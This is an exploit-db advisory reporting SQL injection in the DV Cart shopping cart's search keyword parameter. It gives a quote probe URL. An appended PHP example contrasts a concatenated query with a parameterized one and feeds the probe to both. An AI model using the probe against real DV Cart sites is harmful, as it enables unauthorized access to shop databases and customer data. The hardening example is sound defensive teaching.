DV Cart Shopping Cart software – SQL Injection

  • Author: Eyup CELIK
    Date: 2011-08-22
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/17710/
  • # Exploit Title: DV Cart (E-Commerce System) SQL Injection
    # Date: 19.08.2011
    # Author: Eyup CELIK
    # Software Link: http://www.esmistudio.com
    # Version: All versions
    # Tested on: All versions are vulnerable
    
    ISSUE
    
    SQL injection is possible through the search input (the keyword parameter).
    
    Example
    index.php?keyword=<SQL Injection Code>&mod=search&submit=GO
    
    Exploit:
    index.php?keyword='1&mod=search&submit=GO
    
    Demo:
    http://site.com/dv10dis/index.php?keyword=%271&mod=search&submit=GO
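
The quote probe in the keyword parameter changes the statement only if the search query is built by string concatenation. The PHP below is an added example, not DV Cart code and not from the advisory's author: it assumes a hypothetical products table and hypothetical function names, and uses in-memory SQLite through PDO to contrast a concatenated search query with a parameterized one.

```php
<?php
// Added illustration, NOT DV Cart source code. The products table and the
// function names are hypothetical; the database is in-memory SQLite via PDO.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)");
$db->exec("INSERT INTO products (name) VALUES ('Red mug'), ('Blue mug'), ('O''Neill cap')");

// Assumed vulnerable pattern: the keyword is concatenated into the SQL text,
// so a quote in the input ends the string literal and changes the statement.
function search_concat(PDO $db, string $keyword): array
{
    $sql = "SELECT name FROM products WHERE name LIKE '%" . $keyword . "%'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened form: the keyword is bound as a parameter and never parsed as SQL.
// LIKE wildcards in the input are escaped so they match literally.
function search_bound(PDO $db, string $keyword): array
{
    $escaped = addcslashes($keyword, '%_\\');
    $stmt = $db->prepare("SELECT name FROM products WHERE name LIKE :kw ESCAPE '\\'");
    $stmt->execute([':kw' => '%' . $escaped . '%']);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed inputs: a normal search, the quote probe from the advisory,
// and a legitimate product name that happens to contain a quote.
foreach (['mug', "'1", "O'Neill"] as $keyword) {
    try {
        $concat = json_encode(search_concat($db, $keyword));
    } catch (PDOException $e) {
        $concat = 'SQL error: ' . $e->getMessage();
    }
    $bound = json_encode(search_bound($db, $keyword));
    printf("keyword=%-8s concat: %s\n%17s bound:  %s\n", $keyword, $concat, '', $bound);
}
```

The concatenated form also fails on the legitimate keyword containing a quote, so SQL syntax errors tied to search requests in the application's error log are a sign that the query is being built this way.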